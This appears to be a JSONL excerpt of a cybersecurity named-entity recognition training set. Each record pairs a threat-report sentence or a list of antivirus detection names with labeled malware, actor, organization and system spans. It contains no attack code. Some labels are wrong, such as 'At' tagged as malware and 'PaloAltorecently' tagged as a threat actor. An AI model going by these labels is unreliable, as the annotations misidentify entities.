{"text": "This finding was listed in our Anthem blog, and we have continued to monitor it in ThreatConnect since mid February.", "spans": {"ORGANIZATION: Anthem": [[31, 37]], "SYSTEM: ThreatConnect": [[83, 96]]}, "info": {"id": "cyner2_train_007535", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.JapiletAA.Trojan Trojan.Dropper.Delf.BB Worm.Win32.Fesber!O Worm.Fesber Worm.Fesber.Win32.3 Trojan/Fesber.a W32/Fesber.A Win32/Fesber.A WORM_YERO.A Win.Worm.Yero-1 Worm.Win32.Fesber.g Trojan.Dropper.Delf.BB Virus.Win32.Fesber.iiof Worm.Win32.A.Fesber.13116[UPX] Virus.Win32.Fesber.k Trojan.Dropper.Delf.BB Win32.HLLW.FSB WORM_YERO.A BehavesLike.Win32.Fesber.vh W32/Fesber.QPGQ-0002 Worm/Fesber.g Worm/Win32.Fesber.g Worm.Fesber.kcloud Worm:Win32/Fesber.A Trojan.Dropper.Delf.BB Troj.PSW32.W.QQPass.lgj2 Worm.Win32.Fesber.g Trojan.Dropper.Delf.BB Worm/Win32.Fesber.R4309 Trojan.Dropper.Delf.BB Virus.Fsb.1 I-Worm.Fesber.A Win32/Fesber.A Worm.Fesber!I2XPvd5yXYs Worm.Win32.Fesber W32/Cosmu.H.worm Worm.Win32.Fesber.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007536", "source": "cyner2_train"}}
{"text": "What is special about it is that it comes as a Windows link file, .LNK, that downloads and runs a malicious HTML application, .HTA, that drops and executes a malicious binary.", "spans": {}, "info": {"id": "cyner2_train_007537", "source": "cyner2_train"}}
{"text": "Our analysis of the Adobe Flash zero-day vulnerability used in the latest Pawn Storm campaign reveals that the previous mitigation techniques introduced by Adobe were not enough to secure the platform.", "spans": {"SYSTEM: Adobe Flash": [[20, 31]], "VULNERABILITY: zero-day vulnerability": [[32, 54]], "THREAT_ACTOR: Pawn Storm campaign": [[74, 93]], "ORGANIZATION: Adobe": [[156, 161]]}, "info": {"id": "cyner2_train_007540", "source": "cyner2_train"}}
{"text": "The actors behind Dridex 220 and Locky Affid=3 have introduced a new ransomware called Bart", "spans": {"MALWARE: Dridex 220": [[18, 28]], "MALWARE: Locky Affid=3": [[33, 46]], "MALWARE: ransomware": [[69, 79]], "MALWARE: Bart": [[87, 91]]}, "info": {"id": "cyner2_train_007541", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Application.Joke.Flipped.E Joke.Flipped Riskware.Win16.Flipped.yzsd Joke.Flipped JOKE_FLIPPED.A Joke.Flipped Application.Joke.Flipped.E Joke.Flipped Application.Joke.Flipped Joke.Flipped JOKE_FLIPPED.A Joke.Flipped Backdoor/IRC.IRC Joke:Win32/Flipped.A Trojan.Win32.A.Zbot.4128 Application.Joke.Flipped.E Joke.Flipped Joke.Flipped", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007542", "source": "cyner2_train"}}
{"text": "Komplex shares a significant amount of functionality and traits with another tool used by Sofacy – the Carberp variant that Sofacy had used in previous attack campaigns on systems running Windows.", "spans": {"MALWARE: Komplex": [[0, 7]], "MALWARE: tool": [[77, 81]], "THREAT_ACTOR: Sofacy": [[90, 96], [124, 130]], "MALWARE: Carberp variant": [[103, 118]], "THREAT_ACTOR: attack campaigns": [[152, 168]], "SYSTEM: systems running Windows.": [[172, 196]]}, "info": {"id": "cyner2_train_007543", "source": "cyner2_train"}}
{"text": "In 2014, our colleagues at Crowdstrike wrote an exposé about a long-standing Chinese APT threat group they self-named Putter Panda, which Mandiant/FireEye refers to as APT2.", "spans": {"ORGANIZATION: colleagues": [[13, 23]], "ORGANIZATION: Crowdstrike": [[27, 38]], "THREAT_ACTOR: Chinese APT threat group": [[77, 101]], "THREAT_ACTOR: Putter Panda,": [[118, 131]], "ORGANIZATION: Mandiant/FireEye": [[138, 154]], "THREAT_ACTOR: APT2.": [[168, 173]]}, "info": {"id": "cyner2_train_007545", "source": "cyner2_train"}}
{"text": "Apache Tomcat is a java based web service that is used for different applications.", "spans": {"SYSTEM: Apache Tomcat": [[0, 13]], "SYSTEM: java": [[19, 23]], "SYSTEM: web service": [[30, 41]], "SYSTEM: different applications.": [[59, 82]]}, "info": {"id": "cyner2_train_007546", "source": "cyner2_train"}}
{"text": "Among the 153 configuration files, 54 distinct command and control C C servers were detected.", "spans": {}, "info": {"id": "cyner2_train_007547", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.RedCap.ewfcku BehavesLike.Win32.VBobfus.gc Trojan.CopyKittens TR/RedCap.eevfy Trojan.Razy.D33AF6 TrojanDropper:Win32/Noratops.B!dha Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007548", "source": "cyner2_train"}}
{"text": "According to a blog article by Microsoft, the malware is associated with an attacker group identified as DarkHotel Microsoft calls it as Dubnium .", "spans": {"ORGANIZATION: Microsoft,": [[31, 41]], "MALWARE: malware": [[46, 53]], "THREAT_ACTOR: attacker group": [[76, 90]], "THREAT_ACTOR: DarkHotel": [[105, 114]], "ORGANIZATION: Microsoft": [[115, 124]], "THREAT_ACTOR: Dubnium": [[137, 144]]}, "info": {"id": "cyner2_train_007549", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Lamer.KL8 PE_LAMER_EL150191.UVPM Win32.Trojan.WisdomEyes.16070401.9500.9987 PE_LAMER_EL150191.UVPM Virus.Win32.Lamer.kl Virus.W32.Lamer!c ApplicUnsaf.Win32.ScreenMate.AA Backdoor.PePatch.Win32.75884 Virus.Win32.Lamer TR/Taranis.2787 Trojan[Ransom]/Win32.CryFile Virus.Win32.Lamer.kl Hoax.CryFile Virus.Win32.Lamer.j Win32/Virus.HideDoc.L", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007550", "source": "cyner2_train"}}
{"text": "Google's security team recently identified a new domain masquerading as an official EFF site as part of a targeted malware campaign.", "spans": {"ORGANIZATION: Google's security team": [[0, 22]], "THREAT_ACTOR: malware campaign.": [[115, 132]]}, "info": {"id": "cyner2_train_007552", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.OnGameELAIUZAC.Trojan Trojan.Zusy.D3B59 Win32.Trojan.WisdomEyes.16070401.9500.9997 Trojan.Win32.Clicker.cwyjjr Trojan.Click2.34240 Win32.Troj.Undef.kcloud Trojan:MSIL/Ainscomp.A Trj/CI.A Trojan.Ainscomp!KTuN3cZslCo Trojan.Msil Win32/Trojan.bfc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007553", "source": "cyner2_train"}}
{"text": "The three InPage exploit files are linked through their use of very similar shellcode, which suggests that either the same actor is behind these attacks, or the attackers have access to a shared builder.", "spans": {"MALWARE: InPage exploit": [[10, 24]], "THREAT_ACTOR: the same actor": [[114, 128]], "THREAT_ACTOR: the attackers": [[157, 170]]}, "info": {"id": "cyner2_train_007557", "source": "cyner2_train"}}
{"text": "A new type of macOS-based stealer is being sold on the dark web for $100 £70.", "spans": {"MALWARE: macOS-based stealer": [[14, 33]]}, "info": {"id": "cyner2_train_007558", "source": "cyner2_train"}}
{"text": "The emails sent by this campaign may look spartan to the professional eye but, as ever, the human point of interaction with systems is the most vulnerable: by potentially reaching so many individuals, campaigns such as this can - and do - succeed in infecting people.", "spans": {"THREAT_ACTOR: campaign": [[24, 32]], "SYSTEM: systems": [[124, 131]], "VULNERABILITY: vulnerable:": [[144, 155]], "ORGANIZATION: individuals,": [[188, 200]], "THREAT_ACTOR: campaigns": [[201, 210]]}, "info": {"id": "cyner2_train_007561", "source": "cyner2_train"}}
{"text": "Most custom backdoors used by advanced attackers have limited functionality.", "spans": {"MALWARE: custom backdoors": [[5, 21]], "THREAT_ACTOR: advanced attackers": [[30, 48]]}, "info": {"id": "cyner2_train_007563", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Bifrose.nel Win.Trojan.AutoIT-6333854-0 Trojan-Dropper.Win32.Autoit.bvg Trojan.Win32.AutoIt.expdpu BehavesLike.Win32.Backdoor.tc Trojan.Win32.Z.Autoit.1633763 Dropper/Win32.Androm.C2387785 Win32/Injector.Autoit.DFJ Backdoor.MSIL W32/Injector.CYH!tr Win32/Trojan.38f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007567", "source": "cyner2_train"}}
{"text": "Over the past couple of months McAfee Labs has seen an increase in the usage of macros to deliver malware.", "spans": {"ORGANIZATION: McAfee Labs": [[31, 42]], "MALWARE: macros": [[80, 86]], "MALWARE: malware.": [[98, 106]]}, "info": {"id": "cyner2_train_007571", "source": "cyner2_train"}}
{"text": "We mostly observe attacks using Elirks occurring in East Asia.", "spans": {"MALWARE: Elirks": [[32, 38]]}, "info": {"id": "cyner2_train_007572", "source": "cyner2_train"}}
{"text": "We observed an anomaly when approximately 60 domains all [.]top TLDs registered on April 7, 2016 started serving a coin mining malware – to mine BitMonero, a form of digital currency – on their main page under the mime-type of html/text.", "spans": {"MALWARE: coin mining malware": [[115, 134]]}, "info": {"id": "cyner2_train_007573", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAutoB.E147 Trojan.Banker.Win32.5895 Trojan/Banker.ju W32/Banker.AJC Win.Trojan.Bancos-852 Trojan-Banker.Win32.Banker.ju Trojan.Win32.Banker.bmncx Trojan.PWS.Banker.based Trojan-Spy.Win32.Banker W32/Banker.WTGS-4277 Trojan/Banker.Banker.ufm Trojan[Banker]/Win32.Banker Trojan-Banker.Win32.Banker.ju TrojanBanker.Banker Trojan.Banker!qguLAzH8AII W32/Banker.DUU!tr Trj/Banker.FWD Win32/Trojan.a46", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007574", "source": "cyner2_train"}}
{"text": "At least two different stealers, Rhadamanthys and RedLine, were abusing the search engine promotion plan in order to deliver malicious payloads to victims' machines.", "spans": {"MALWARE: At": [[0, 2]], "MALWARE: stealers, Rhadamanthys": [[23, 45]], "MALWARE: RedLine,": [[50, 58]], "SYSTEM: the search engine": [[72, 89]], "MALWARE: malicious payloads": [[125, 143]], "SYSTEM: victims' machines.": [[147, 165]]}, "info": {"id": "cyner2_train_007575", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9925 Trojan.Win32.Graftor.bovqdb TrojWare.Win32.GameThief.Nilage.~CRSH TR/Graftor.Elzob.6117.1 Backdoor:Win32/Parcim.A Trj/CI.A Trojan.Graftor.Elzob.D17E5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007576", "source": "cyner2_train"}}
{"text": "It has been in the news the past few weeks as it is the bot that was used in the DDoS attack on Brian Kreb's security blog.", "spans": {"MALWARE: bot": [[56, 59]], "ORGANIZATION: Brian Kreb's security blog.": [[96, 123]]}, "info": {"id": "cyner2_train_007577", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Jevafus.A Trojan.Jevafus.A Trojan.Jevafus.A Trojan.Win32.Drop.euelge Trojan.Jevafus.A Trojan.Jevafus.A BehavesLike.Win32.BadFile.vh TrojanDropper:Win32/Jevafus.A Trojan.Jevafus.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007578", "source": "cyner2_train"}}
{"text": "So far, all theories regarding the spread of ExPetr/Petya point into two directions:", "spans": {}, "info": {"id": "cyner2_train_007579", "source": "cyner2_train"}}
{"text": "The CatB ransomware family, sometimes referred to as CatB99 or Baxtoy, was first observed in late 2022, with campaigns being observed steadily since November.", "spans": {"MALWARE: The CatB ransomware family,": [[0, 27]], "MALWARE: CatB99": [[53, 59]], "MALWARE: Baxtoy,": [[63, 70]], "THREAT_ACTOR: campaigns": [[109, 118]]}, "info": {"id": "cyner2_train_007581", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Svectas.Win64.1 Packer.Win32.Katusha TR/Svectas.smnlb W64/Svectas.B!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007582", "source": "cyner2_train"}}
{"text": "PaloAltorecently discovered a new Android Trojan called SpyNote which facilitates remote spying.", "spans": {"THREAT_ACTOR: PaloAltorecently": [[0, 16]], "MALWARE: Android Trojan": [[34, 48]], "MALWARE: SpyNote": [[56, 63]]}, "info": {"id": "cyner2_train_007583", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAutoB.F81D Trojan.Mikhail.Win32.4 Trojan.Ransom.Mischa.2 Ransom_MISCHA.SM Win32.Trojan.WisdomEyes.16070401.9500.9999 Ransom_MISCHA.SM Win32.Trojan-Ransom.Petya.D Trojan-Ransom.Win32.Mikhail.a Trojan.Win32.Petya.96256 Trojan.Encoder.4544 Trojan.Petr.a TR/AD.Petya.Y.rxxx Trojan[Ransom]/Win32.Mikhail Ransom:Win32/Mischa.A Trojan-Ransom.Win32.Mikhail.a Trojan/Win32.Mischa.C1478164 Hoax.Mikhail Trojan.Mikhail!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007584", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Doc.Exploit.DDEautoexec-6346603-0 Exploit.Xml.DDEAuto.euqmxe Trojan[Exploit]/MSOffice.DDE.c Win32.Outbreak", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007585", "source": "cyner2_train"}}
{"text": "The end result is a new banking Trojan in the wild.", "spans": {"MALWARE: banking Trojan": [[24, 38]]}, "info": {"id": "cyner2_train_007587", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9899 HV_ROGUE_CG152C85.RDXN Heur.Packed.Unknown TR/Spy.Banker.45879 TrojanProxy:BAT/Banker.G Win32/RiskWare.PEMalform.E", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007588", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Proxy/W32.Steredir.504832 Trojan/Proxy.Steredir.c Trojan-Proxy.Win32.Steredir.c Trojan.Win32.Steredir.fqli Troj.Proxy.W32.Steredir.c!c TrojWare.Win32.TrojanProxy.Steredir.C Trojan.Stedir.11 Trojan.Steredir.Win32.7 Trojan-Dropper.Delf W32/Risk.RESM-4501 TrojanProxy.Steredir.c TR/Proxy.Steredir.C Trojan[Proxy]/Win32.Steredir Win32.Troj.Steredir.c.kcloud Trojan.Heur.EFD23B1 Trojan.Win32.Proxy.504832 Trojan-Proxy.Win32.Steredir.c TrojanProxy:Win32/Steredir.C Win32/TrojanProxy.Steredir.C Trojan.PR.Steredir!cYzY1isGQt0 W32/Steredir.C!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007589", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 BehavesLike.Win32.Trojan.gc Trojan.MSIL.Bladabindi.1 HackTool:MSIL/Injector.A Trojan.LVBP.ED Backdoor.Win32.DarkKomet", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007592", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Win32.Hupigon!O TrojanDropper.Dowque.A8 Backdoor.Hupigon.Win32.182 Backdoor/Hupigon.dkwt TROJ_DOWQUE.NY Win32.Trojan.Delf.b W32/Backdoor2.CWRX Backdoor.Graybird TROJ_DOWQUE.NY Win.Worm.Autorun-12451 Backdoor.Win32.Hupigon.56864 Backdoor.W32.Hupigon.l9fO BackDoor.Graybird.75 BehavesLike.Win32.SpywareLyndra.tc W32/Backdoor.DAWT-3367 Backdoor/Huigezi.2008.qny BDS/Farfli.kj.2 Win32.TrojDownloader.dl.kcloud TrojanDropper:Win32/Dowque.A Trojan/Win32.Hupigon.C29670 Backdoor.Bot Win32/Delf.NSN Backdoor.Win32.Hupigon.dkw Backdoor.Hupigon!hgCryiT987Y Backdoor.Win32.HacDef W32/Injector.fam!tr Trojan.Win32.Downloader.M", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007593", "source": "cyner2_train"}}
{"text": "The file is named in such a way as to confuse WordPress administrators who are familiar with XML-RPC.", "spans": {"SYSTEM: WordPress administrators": [[46, 70]]}, "info": {"id": "cyner2_train_007594", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HackTool.Win64.PSWDump.f BehavesLike.Win64.SoftPulse.lh HackTool.Mimikatz HackTool.Win64.PSWDump.f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007596", "source": "cyner2_train"}}
{"text": "The story was about a new vulnerability for *nix-based systems – EternalRed aka SambaCry.", "spans": {"VULNERABILITY: new vulnerability": [[22, 39]], "SYSTEM: *nix-based systems": [[44, 62]], "MALWARE: EternalRed": [[65, 75]], "MALWARE: SambaCry.": [[80, 89]]}, "info": {"id": "cyner2_train_007597", "source": "cyner2_train"}}
{"text": "There have been an emegerence of new domains for FighterPOS recently and I discovered a whole load of other possible domains that could be used for the command and control.", "spans": {"MALWARE: FighterPOS": [[49, 59]]}, "info": {"id": "cyner2_train_007599", "source": "cyner2_train"}}
{"text": "The service connects back to the attacker machine and waits for commands which will be given by the attacker.", "spans": {"THREAT_ACTOR: attacker": [[33, 41]], "SYSTEM: machine": [[42, 49]], "THREAT_ACTOR: the attacker.": [[96, 109]]}, "info": {"id": "cyner2_train_007602", "source": "cyner2_train"}}
{"text": "Crooks behind MajikPOS have various tricks up their sleeves.", "spans": {"THREAT_ACTOR: Crooks": [[0, 6]], "MALWARE: MajikPOS": [[14, 22]]}, "info": {"id": "cyner2_train_007603", "source": "cyner2_train"}}
{"text": "TA473 has continuously leveraged an unpatched Zimbra vulnerability in publicly facing webmail portals that allows them to gain access to the email mailboxes of government entities in Europe.", "spans": {"THREAT_ACTOR: TA473": [[0, 5]], "VULNERABILITY: unpatched Zimbra vulnerability": [[36, 66]], "SYSTEM: publicly facing webmail": [[70, 93]], "SYSTEM: email mailboxes": [[141, 156]], "ORGANIZATION: government entities": [[160, 179]]}, "info": {"id": "cyner2_train_007604", "source": "cyner2_train"}}
{"text": "Presumably from the same author of Petya, which was first seen in December 2016, and the Petya-Mischa combo, which hit users back in July 2016, Janus Cybercrime Solution's latest creation is another step in the evolution of their ransomware-as-a-service expansion.", "spans": {"THREAT_ACTOR: same author": [[20, 31]], "MALWARE: Petya,": [[35, 41]], "MALWARE: Petya-Mischa": [[89, 101]], "ORGANIZATION: users": [[119, 124]], "ORGANIZATION: Janus Cybercrime Solution's": [[144, 171]], "MALWARE: ransomware-as-a-service": [[230, 253]]}, "info": {"id": "cyner2_train_007606", "source": "cyner2_train"}}
{"text": "Our research indicates that the group has sufficient financial resources to purchase the source code of a widely available malware tool, and the human resources to design improved versions of its own backdoors based on this.", "spans": {"ORGANIZATION: Our research": [[0, 12]], "MALWARE: malware tool,": [[123, 136]], "MALWARE: backdoors": [[200, 209]]}, "info": {"id": "cyner2_train_007607", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Downloader.JRQH Trojan.Downloader.JRQH Win32.Trojan.WisdomEyes.16070401.9500.9945 Win32.Trojan-Downloader.Banload.J Trojan-Downloader.MSIL.Banload.bgr Trojan.Downloader.JRQH Trojan.Win32.Banload.dzssxt Trojan.Downloader.JRQH Trojan.Downloader.JRQH Trojan-Downloader.MSIL.Banload.bgr TrojanDownloader:MSIL/Banload.T Trojan/Win32.Banload.C829219 Trojan.Banker.ABR Trj/GdSda.A Msil.Trojan-downloader.Banload.Efkz Trojan-Downloader.MSIL.Banload", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007608", "source": "cyner2_train"}}
{"text": "Trigona ransomware is a relatively new strain that security researchers first discovered in late October 2022.", "spans": {"MALWARE: Trigona ransomware": [[0, 18]], "ORGANIZATION: security researchers": [[51, 71]]}, "info": {"id": "cyner2_train_007609", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.A537 Packed.Win32.TDSS!O RiskWare.Tool.CK BehavesLike.Win32.Downloader.dc TR/Bumat.A.2896 Win32.Troj.Undef.kcloud Win-Trojan/Xema.variant PE:Malware.XPACK-HIE/Heur!1.9C48 Trojan.Crypt W32/Malware_fam.NB Win32/Trojan.648", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007612", "source": "cyner2_train"}}
{"text": "We observed legitimate exfiltrated files of the following types of data : Contact information Compressed recorded audio in the Adaptive Multi-Rate ( amr ) file format Images captured from the device camera Images stored on both internal device and SDCard storage that are listed in the MediaStore Device geolocation information SMS content Chrome browser search history and bookmarks Call log information Cell tower information Device network metadata ; such as phone number , device software version , network country , network operator , SIM country , SIM operator , SIM serial , IMSI , voice mail number , phone type , network type , data state , data activity , call state , SIM state , whether device is roaming , and if SMS is supported .", "spans": {}, "info": {"id": "cyner2_train_007613", "source": "cyner2_train"}}
{"text": "This post describes the new campaign.", "spans": {"THREAT_ACTOR: the new campaign.": [[20, 37]]}, "info": {"id": "cyner2_train_007614", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.2431 Trojan.MSIL.FKV WS.Reputation.1 Stimilik.S Trojan.Win32.Confuser.dkqarl BehavesLike.Win32.Kudj.gc Trojan/Win32.Stealer PUA.MSIL.Confuser", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007615", "source": "cyner2_train"}}
{"text": "Attackers also used the name of the top NIC official in the signature of the email, this is to make it look like the email was sent by a high ranking Government official working at NIC National Informatics Centre.", "spans": {"THREAT_ACTOR: Attackers": [[0, 9]], "ORGANIZATION: NIC official": [[40, 52]], "ORGANIZATION: Government": [[150, 160]], "ORGANIZATION: NIC National Informatics Centre.": [[181, 213]]}, "info": {"id": "cyner2_train_007616", "source": "cyner2_train"}}
{"text": "PaloAlto observed a targeted attack in November directed at an individual working for the French Ministry of Foreign Affairs.", "spans": {"ORGANIZATION: PaloAlto": [[0, 8]], "MALWARE: at": [[57, 59]], "ORGANIZATION: individual": [[63, 73]], "ORGANIZATION: French Ministry of Foreign Affairs.": [[90, 125]]}, "info": {"id": "cyner2_train_007617", "source": "cyner2_train"}}
{"text": "HMRC taxes application with reference L4TI 2A0A UWSV WASP received", "spans": {"ORGANIZATION: HMRC": [[0, 4]]}, "info": {"id": "cyner2_train_007619", "source": "cyner2_train"}}
{"text": "The infection attempts occurred in September and October of 2015 as public frustration grew at the Mexican government's seemingly contradictory statements about the Narvarte case", "spans": {"MALWARE: infection": [[4, 13]], "MALWARE: at": [[92, 94]], "ORGANIZATION: the Mexican government's": [[95, 119]], "ORGANIZATION: the Narvarte case": [[161, 178]]}, "info": {"id": "cyner2_train_007620", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm/W32.Mydoom.28864 W32.Mydoom.M W32/Mydoom.o@MM W32/Mydoom.m I-Worm.Mydoom!qBn5HU3v+Lw W32/Mydoom.O@mm W32.Mydoom.M@mm MyDoom.L@mm Win32/Mydoom.O Win32.Mydoom.m Worm.Mydoom-27 Email-Worm.Win32.Mydoom.m I-Worm.Win32.Mydoom.28864.A Email-Worm.Win32.Mydoom!IK Worm.Win32.Mydoom.R Win32.HLLM.MyDoom.54464 Worm/Mydoom.O.1 W32/Mydoom.o@MM Worm/Sramota.bef Worm/Win32.Mydoom Worm:Win32/Mydoom.O@mm W32/Mydoom.O@mm Win32/Mydoom.worm.49344.B Email-Worm.Win32.Mydoom.m Win32/Mydoom.R Worm.Mail.Mydoom.dh Email-Worm.Win32.Mydoom W32/Mydoom.M!dam I-Worm/Mydoom.O W32/Mydoom.N.worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007621", "source": "cyner2_train"}}
{"text": "The news organization provides reporting on its website in English, Georgian, and Russian.", "spans": {"ORGANIZATION: news organization": [[4, 21]]}, "info": {"id": "cyner2_train_007622", "source": "cyner2_train"}}
{"text": "Mandiant suspects UNC2970 specifically targeted security researchers in this operation.", "spans": {"ORGANIZATION: Mandiant": [[0, 8]], "THREAT_ACTOR: UNC2970": [[18, 25]], "ORGANIZATION: security researchers": [[48, 68]]}, "info": {"id": "cyner2_train_007624", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.LoringK.Trojan Backdoor.Bot.158614 Trojan-Dropper.Win32!O TrojanDropper.Loring.A11 Backdoor.Bot.158614 Backdoor.IRCBot Trojan/IRCBot.ov WORM_KWBOT.AR W32/Risk.VXNU-4867 W32.Kwbot.Worm Win32/Loring.A WORM_KWBOT.AR Win.Trojan.Obfuscated-1662 Backdoor.Bot.158614 Trojan.Win32.Reconyc.gunk Backdoor.Bot.158614 Trojan.Win32.IRCBot.dmigck Dropper.Loring.291411 Backdoor.Bot.158614 Backdoor.Bot.158614 Trojan.MulDrop5.7150 Trojan.Reconyc.Win32.6040 WORM/IrcBot.86875 Trojan[Backdoor]/Win32.IRCBot Win32.Troj.Loring.EA.kcloud Backdoor.Bot.D26B96 Troj.Dropper.W32.Loring.l8Ew Worm/Win32.IRCBot.R3593 TScope.Trojan.Delf Trojan.IRCBot.OV Win32/IRCBot.OV Trojan.DR.Loring!O3IAMVgzzx8 Trojan-Dropper.Win32.Loring", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007627", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Injector.iuc Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32/Pushbot.AJZ WORM_PALEVO.SMA Win.Trojan.Ircbrute-54 Trojan.Win32.Ircbrute.eqsrw Trojan.Spambot.9818 Trojan.Injector.Win32.53831 WORM_PALEVO.SMA BehavesLike.Win32.PWSZbot.lh Backdoor.Win32.IRCBot Trojan/Win32.Unknown Trojan:Win32/Ircbrute.B Trojan.Graftor.DCFC Worm/Win32.Ckbface.R16129 Trojan.Injector!aNdlYeuOVuU", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007628", "source": "cyner2_train"}}
{"text": "While the malware was not detectable by endpoint antivirus products, RSA Security Analytics was able to identify and alert on its network traffic, and RSA ECAT subsequently identified the malware.", "spans": {"MALWARE: malware": [[10, 17]], "ORGANIZATION: RSA Security Analytics": [[69, 91]], "ORGANIZATION: RSA ECAT": [[151, 159]], "MALWARE: malware.": [[188, 196]]}, "info": {"id": "cyner2_train_007629", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Script.400873 Exploit/PDF-URI2.AS Exploit-PDF.f Exploit.W32.Pidief!c PDF.Exploit.Pidief.an Bloodhound.PDF.9 Trojan.Script.400873 Exploit.Win32.Pidief.asz Trojan.Script.400873 Exploit.Script.Pidief.ibwe PDF.S.Exploit.10714 Win32.Exploit.Pidief.Anfp Trojan.Script.400873 Exploit.JS.Pdfka.MJ Trojan.Script.400873 Exploit.PDF.303 HEUR_PDFEXP.B BehavesLike.PDF.Trojan.lr Exploit:Win32/Pdffir.A Trojan.Script.D61DE9 Exploit.Win32.Pidief.asz PDF/Pidief.EI Trojan.Script.400873 Exploit.Win32.Pidief.asz JS.Crypt.BSP Exploit.JS.Pdfka JS/Pdfka.BSP!exploit virus.pdf.20090837.1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007630", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.DropperZbotS.Trojan Trojan-Spy.Win32.Zbot!O Trojan.AutoIt.Pik.A Backdoor/Poison.evja Trojan.Zbot Trojan.Win32.Autoit.pik Trojan.Win32.Autoit.exoora Trojan.Win32.Z.Autoit.955563 Troj.W32.Autoit!c BehavesLike.Win32.Dropper.dc Trojan.Win32.Injector Trojan.Autoit.kzp TR/AD.Zbot.cgaww Trojan.Win32.Autoit.pik Trojan:Win32/Krilog.A Trojan.Autoit.F Win32/Injector.Autoit.AOI Win32.Trojan.Autoit.Edne W32/Autoit.NWS!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007631", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.DakusarDRW.Trojan Trojan.Blocker.Win32.34866 Trojan.DownLoader24.32105 BehavesLike.Win32.Shodi.tc Worm:Win32/Icorimg.A Trojan.Strictor.D1C7BA HEUR/Fakon.mwf Trojan.Worm!33g50yRKTx8 Trojan.FLCM!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007633", "source": "cyner2_train"}}
{"text": "Upon further inspection, the RAT appeared to share many similarities with an old Chinese backdoor known as Hacker's Door first released publicly in 2004 and updated in 2005.", "spans": {"MALWARE: the RAT": [[25, 32]], "MALWARE: an old Chinese backdoor": [[74, 97]], "MALWARE: Hacker's Door": [[107, 120]]}, "info": {"id": "cyner2_train_007635", "source": "cyner2_train"}}
{"text": "A backdoor also known as: BackDoor-CMQ.dldr Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_HORST.SMPE Monitor.W32.WebWatcher.lt5Y TROJ_HORST.SMPE BackDoor-CMQ.dldr Trojan.Graftor.D476C BScope.Malware-Cryptor.Win32.313 Trojan.Win32.Cosmu W32/Dloader.BOW!tr.dldr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007637", "source": "cyner2_train"}}
{"text": "The campaign was active between November 2016 and January 2017, targeting a limited number of people.", "spans": {"THREAT_ACTOR: campaign": [[4, 12]], "ORGANIZATION: limited number of people.": [[76, 101]]}, "info": {"id": "cyner2_train_007638", "source": "cyner2_train"}}
